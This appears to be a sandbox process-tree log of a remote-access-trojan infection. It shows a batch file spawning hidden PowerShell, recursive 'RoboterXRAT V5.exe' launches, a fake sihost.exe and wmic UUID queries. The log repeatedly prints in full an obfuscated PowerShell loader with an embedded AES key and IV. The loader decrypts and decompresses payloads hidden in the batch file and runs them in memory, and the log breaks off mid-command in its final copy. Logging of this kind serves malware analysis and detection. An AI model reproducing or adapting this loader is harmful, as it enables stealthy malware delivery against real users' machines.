C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));24⤵
- Command and Scripting Interpreter: PowerShell
PID:6064
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"23⤵PID:5520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "22⤵PID:1888
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV123⤵PID:208
-
-
C:\Windows\system32\net.exenet file23⤵PID:3912
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file24⤵PID:224
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));23⤵
- Command and Scripting Interpreter: PowerShell
PID:4784
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"22⤵PID:5380
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"23⤵PID:5532
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"24⤵PID:4456
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"25⤵PID:4888
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"26⤵PID:5412
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"27⤵PID:2348
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"28⤵PID:2148
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"29⤵PID:1720
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"30⤵PID:3088
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"31⤵PID:6092
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"32⤵PID:3020
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"33⤵PID:5852
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"34⤵PID:2000
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"35⤵PID:4452
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"36⤵PID:5800
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"37⤵PID:3060
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"38⤵PID:5900
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"39⤵PID:5308
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"40⤵PID:5348
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"41⤵PID:5176
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"42⤵PID:920
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"43⤵PID:5192
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"44⤵PID:2724
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"45⤵PID:3604
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"46⤵PID:2800
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"47⤵PID:1944
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"48⤵PID:4712
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"49⤵PID:2020
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"50⤵PID:4328
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"51⤵PID:3880
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"52⤵PID:3228
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"53⤵PID:364
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"54⤵PID:5620
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"55⤵PID:5196
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"56⤵PID:4752
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"57⤵PID:3608
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"58⤵PID:4608
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"59⤵PID:2592
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"59⤵PID:4268
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"59⤵PID:4384
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"58⤵PID:400
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"58⤵PID:2428
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid59⤵PID:4440
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"57⤵PID:4632
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"57⤵PID:2032
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid58⤵PID:2924
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV159⤵PID:5632
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"56⤵PID:5212
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"56⤵PID:6132
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid57⤵PID:3156
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"55⤵PID:360
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"55⤵PID:5344
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid56⤵PID:6128
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"54⤵PID:4528
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"54⤵PID:5328
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid55⤵PID:6076
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"53⤵PID:5720
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"53⤵PID:4692
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid54⤵PID:6004
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"52⤵PID:1952
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"52⤵PID:5716
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid53⤵PID:4732
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"51⤵PID:1464
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"51⤵PID:5988
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid52⤵PID:5856
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"50⤵PID:4128
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"50⤵PID:1932
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid51⤵PID:2912
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"49⤵PID:4784
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"49⤵PID:5964
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid50⤵PID:4900
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"48⤵PID:1032
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"48⤵PID:5596
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid49⤵PID:5916
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"47⤵PID:4612
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"47⤵PID:1000
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid48⤵PID:5996
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"46⤵PID:5496
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"46⤵PID:4752
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid47⤵PID:4460
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"45⤵PID:2748
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"45⤵PID:4896
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid46⤵PID:3732
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"44⤵PID:4528
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"44⤵PID:6088
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid45⤵PID:5176
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"43⤵PID:364
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"43⤵PID:4900
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid44⤵PID:3872
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"42⤵PID:5360
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"42⤵PID:2000
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid43⤵PID:224
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV144⤵PID:5936
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"41⤵PID:2520
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"41⤵PID:4744
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid42⤵PID:4308
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"40⤵PID:6108
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"40⤵PID:1952
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid41⤵PID:352
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"39⤵PID:1036
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"39⤵PID:4220
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid40⤵PID:5996
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"38⤵PID:4760
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"38⤵PID:1824
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid39⤵PID:5168
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"37⤵PID:2380
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"37⤵PID:4544
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid38⤵PID:5632
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV139⤵PID:5132
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"36⤵PID:68
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"36⤵PID:5648
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid37⤵PID:5196
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"35⤵PID:3292
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"35⤵PID:5936
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid36⤵PID:5744
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"34⤵PID:3916
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"34⤵PID:4596
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid35⤵PID:3880
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"33⤵PID:5560
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"33⤵PID:3876
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid34⤵PID:5192
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"32⤵PID:5608
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"32⤵PID:5176
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid33⤵PID:3628
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"31⤵PID:5132
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"31⤵PID:5224
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid32⤵PID:2552
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"30⤵PID:1548
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"30⤵PID:2688
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"29⤵PID:4428
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"29⤵PID:5984
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid30⤵PID:1232
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"28⤵PID:3020
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"28⤵PID:2808
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid29⤵PID:1328
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV130⤵PID:5816
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"27⤵PID:5736
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"27⤵PID:5692
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid28⤵PID:4532
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"26⤵PID:4452
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"26⤵PID:168
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"25⤵PID:4228
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"25⤵PID:1232
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"24⤵PID:1648
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"24⤵PID:3628
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"23⤵PID:5960
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"23⤵PID:1340
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "21⤵PID:2032
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV122⤵PID:3428
-
-
C:\Windows\system32\net.exenet file22⤵PID:824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file23⤵PID:1792
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));22⤵
- Command and Scripting Interpreter: PowerShell
PID:1548
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"21⤵PID:2864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "20⤵PID:2016
-
C:\Windows\system32\net.exenet file21⤵PID:5352
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file22⤵PID:3916
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; 